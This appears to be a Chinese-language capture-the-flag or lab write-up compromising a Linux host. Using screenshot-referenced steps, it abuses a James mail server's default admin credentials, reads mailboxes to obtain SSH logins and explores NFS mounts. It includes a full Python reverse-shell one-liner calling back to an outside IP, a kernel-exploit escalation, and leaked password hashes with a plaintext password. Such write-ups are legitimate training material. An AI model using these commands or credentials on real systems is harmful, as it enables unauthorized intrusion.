端口扫描

Pasted_image_20240801214340.png

Pasted_image_20240801214411.png

发现开放了web端口,但是好像没有内容
Pasted_image_20240801214503.png

发现存在james服务,使用exploit https://www.exploit-db.com/exploits/50347  发现好像没作用
Pasted_image_20240801214540.png

默认用户名密码为root/root
Pasted_image_20240801214623.png

可以使用setpassword重置用户密码
Pasted_image_20240801214655.png

然后访问110端口 使用 USER john 登录,发现没有回应
同时,发现存在2049 nfs端口。
使用 showmount -e  10.11.1.72 检测映射的文件夹
Pasted_image_20240801214745.png

在本地创建个nfs目录,然后使用 mount -t nfs  10.11.1.72:/home  nfs 进行挂载
Pasted_image_20240801214821.png

可以看到成功的挂载了,只有marcus目录有内容
Pasted_image_20240801214854.png

但是用户组不对没法打开
Pasted_image_20240801214923.png

是因为默认挂在成了NFS4的版本
Pasted_image_20240801214950.png

取消挂载并设置NFSv3版本
umount nfs  
mount -t nfs -o vers=3 10.11.1.72:/home nfs  

Pasted_image_20240801215055.png

现在正确显示了用户和组,但是依然读取不了,陷入了循环!nfs好像只提供了linux系统的用户有哪些,更像是一个兔子洞。

继续回到110端口,真TM的,telnet就可以。

Pasted_image_20240801215147.png

john没有内容
Pasted_image_20240801215217.png

在尝试ryuu用户时,终于看到了希望
Pasted_image_20240801215245.png

获取到了用户名和密码 
  • username: ryuu password: QUHqhUPRKXMo4m7k

Pasted_image_20240801215331.png

使用上面的密码登录ssh能够正常的登录。使用ctrl + c 跳过
Pasted_image_20240801215415.png

又是32位版本linux,唉
Pasted_image_20240801215504.png

使用python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.212",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'

Pasted_image_20240801215603.png

提权

通过脚本 https://github.com/InteliSecureLabs/Linux_Exploit_Suggester/blob/master/Linux_Exploit_Suggester.pl  找到几个可以提权的漏洞

Pasted_image_20240801215638.png

使用 https://www.exploit-db.com/exploits/35161  进行提权
Pasted_image_20240801215720.png

读取proof.txt文件,内容:94b90a5f2996a89b71d814d4f96c22f3
Pasted_image_20240801215759.png

彩蛋(不是)

Pasted_image_20240801215831.png

搜集

该linux主机用户名和密码信息:

用户名 哈希 密码
root $6$WWXC6Cv2$OeknUkXwiX3uctRjRIhK0AYzLv6uCjZGxJgtAdCy4YM4cHMKgyDtIJirEO/m.pgiiwFHfJTAndfATNQN1X0c2.
ryuu $6$tIWQdOd.$Adfe4hYI9n1ovKBIr9xByjslPY86Fiar7jMFRT2FfGAXwXD1mwLpsl1lpoo5jm4Y.XjD54TA/.Wp.ql0x4FUG/ QUHqhUPRKXMo4m7k